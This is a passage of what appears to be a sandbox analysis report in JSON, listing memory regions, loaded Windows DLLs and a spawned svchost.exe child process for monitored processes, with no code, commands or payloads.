32768, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2916351, "entry_point": 0, "filename": null, "id": "region_2786", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:05:12.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1969881088, "type": "region", "version": 1 }, "end_va": 1969954815, "entry_point": 1969881088, "filename": "\\Windows\\SysWOW64\\dhcpcsvc.dll", "id": "region_2787", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\syswow64\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1969881088, "timestamp": "00:05:12.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 2004746240, "type": "region", "version": 1 }, "end_va": 2004963327, "entry_point": 2004746240, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2788", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 2004746240, "timestamp": "00:05:12.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1245184, "start_va": 53936128, "type": "region", "version": 1 }, "end_va": 55181311, "entry_point": 0, "filename": null, "id": "region_2789", "name": "private_0x0000000003370000", "norm_filename": null, "region_type": "private_memory", "start_va": 53936128, "timestamp": "00:05:12.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4718591, "entry_point": 0, "filename": null, "id": "region_2790", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:05:12.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 5177343, "entry_point": 0, "filename": null, "id": "region_2791", "name": "private_0x00000000004b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4915200, "timestamp": "00:05:12.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38731776, "type": "region", "version": 1 }, "end_va": 39780351, "entry_point": 0, "filename": null, "id": "region_2792", "name": "private_0x00000000024f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38731776, "timestamp": "00:05:12.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2793", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:05:12.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 134217728, "start_va": 55181312, "type": "region", "version": 1 }, "end_va": 189399039, "entry_point": 0, "filename": null, "id": "region_2794", "name": "private_0x00000000034a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 55181312, "timestamp": "00:05:12.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4308991, "entry_point": 0, "filename": null, "id": "region_2795", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:05:12.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1982070784, "type": "region", "version": 1 }, "end_va": 1983238143, "entry_point": 1982070784, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_2796", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1982070784, "timestamp": "00:05:12.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1983250432, "type": "region", "version": 1 }, "end_va": 1983299583, "entry_point": 1983250432, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_2797", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1983250432, "timestamp": "00:05:12.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1974272000, "type": "region", "version": 1 }, "end_va": 1974292479, "entry_point": 1974272000, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_2798", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1974272000, "timestamp": "00:05:12.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1978793984, "type": "region", "version": 1 }, "end_va": 1979797503, "entry_point": 1978793984, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_2799", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1978793984, "timestamp": "00:05:12.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987862527, "entry_point": 1986592768, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_2800", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:05:12.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1975779328, "type": "region", "version": 1 }, "end_va": 1977855999, "entry_point": 1975779328, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_2801", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1975779328, "timestamp": "00:05:12.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1969815552, "type": "region", "version": 1 }, "end_va": 1969848319, "entry_point": 1969815552, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2802", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1969815552, "timestamp": "00:05:12.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1376256, "start_va": 189399040, "type": "region", "version": 1 }, "end_va": 190775295, "entry_point": 0, "filename": null, "id": "region_2803", "name": "private_0x000000000b4a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 189399040, "timestamp": "00:05:12.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1969684480, "type": "region", "version": 1 }, "end_va": 1969774591, "entry_point": 1969684480, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2804", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1969684480, "timestamp": "00:05:12.823", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 53936128, "type": "region", "version": 1 }, "end_va": 54181887, "entry_point": 53936128, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2805", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 53936128, "timestamp": "00:05:12.834", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 54919168, "type": "region", "version": 1 }, "end_va": 55181311, "entry_point": 0, "filename": null, "id": "region_2806", "name": "private_0x0000000003460000", "norm_filename": null, "region_type": "private_memory", "start_va": 54919168, "timestamp": "00:05:12.834", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1969422336, "type": "region", "version": 1 }, "end_va": 1969663999, "entry_point": 1969422336, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2811", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1969422336, "timestamp": "00:05:12.867", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2953215, "entry_point": 0, "filename": null, "id": "region_2812", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:05:12.872", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", "filename": "c:\\windows\\syswow64\\svchost.exe", "id": "proc_16", "image_name": "svchost.exe", "monitor_reason": "child_process", "monitored_id": 16, "origin_monitor_id": 15, "ref_parent_process": { "ref_id": "proc_15", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2813", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:05:12.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2814", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:05:12.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2815", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:05:12.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2816", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:05:12.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2817", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:05:12.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 573439, "entry_point": 0, "filename": null, "id": "region_2818", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:05:12.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_2819", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:05:12.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_2820", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:05:12.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 9830400, "type": "region", "version": 1 }, "end_va": 9863167, "entry_point": 9830400, "filename": "\\Windows\\SysWOW64\\svchost.exe", "id": "region_2821", "name": "svchost.exe", "norm_filename": "c:\\windows\\syswow64\\svchost.exe", "region_type": "memory_mapped_file", "start_va": 9830400, "timestamp": "00:05:12.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007826432, "type": "region", "version": 1 }, "end_va": 2009567231, "entry_point": 2007826432, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2822", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007826432, "timestamp": "00:05:12.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2009792512, "type": "region", "version": 1 }, "end_va": 2011365375, "entry_point": 2009792512, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2823", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2009792512, "timestamp": "00:05:12.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2824", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:05:12.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2825", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:05:12.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2826", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:05:12.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2827", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:05:12.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2828", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:05:12.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2829", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:05:12.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2830", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:05:12.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_2831", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:05:12.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_2832", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:05:12.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_2833", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:05:12.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1950154752, "type": "region", "version": 1 }, "end_va": 1950187519, "entry_point": 1950154752, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2834", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1950154752, "timestamp": "00:05:12.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1950220288, "type": "region", "version": 1 }, "end_va": 1950597119, "entry_point": 1950220288, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2835", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1950220288, "timestamp": "00:05:12.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1950613504, "type": "region", "version": 1 }, "end_va": 1950871551, "entry_point": 1950613504, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2836", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1950613504, "timestamp": "00:05:12.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2005598208, "type": "region", "version": 1 }, "end_va": 2006622207, "entry_point": 0, "filename": null, "id": "region_2837", "name": "private_0x00000000778b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2005598208, "timestamp": "00:05:12.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2006646784, "type": "region", "version": 1 }, "end_va": 2007822335, "entry_point": 0, "filename": null, "id": "region_2838", "name": "private_0x00000000779b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2006646784, "timestamp": "00:05:12.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2839", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:05:12.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2840", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:05:12.904", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2322431, "entry_point": 1900544, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2841", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1900544, "timestamp": "00:05:12.904", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4980735, "entry_point": 0, "filename": null, "id": "region_2842", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:05:12.904", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5767167, "entry_point": 0, "filename": null, "id": "region_2843", "name": "private_0x0000000000570000", "norm_filename": null, "region_type": "private_memory", "start_va": 5701632, "timestamp": "00:05:12.904", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1971322880, "type": "region", "version": 1 }, "end_va": 1971372031, "entry_point": 1971322880, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2844", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1971322880, "timestamp": "00:05:12.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1971781631, "entry_point": 1971388416, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2845", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:05:12.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973157888, "type": "region", "version": 1 }, "end_va": 1974271999, "entry_point": 1973157888, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2846", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973157888, "timestamp": "00:05:12.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1978073088, "type": "region", "version": 1 }, "end_va": 1978777599, "entry_point": 1978073088, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2847", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1978073088, "timestamp": "00:05:12.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1986265088, "type": "region", "version": 1 }, "end_va": 1986551807, "entry_point": 1986265088, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2848", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1986265088, "timestamp": "00:05:12.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1987903488, "type": "region", "version": 1 }, "end_va": 1988005887, "entry_point": 1987903488, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2849", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1987903488, "timestamp": "00:05:12.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1988100096, "type": "region", "version": 1 }, "end_va": 1989083135, "entry_point": 1988100096, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2850", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1988100096, "timestamp": "00:05:12.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", 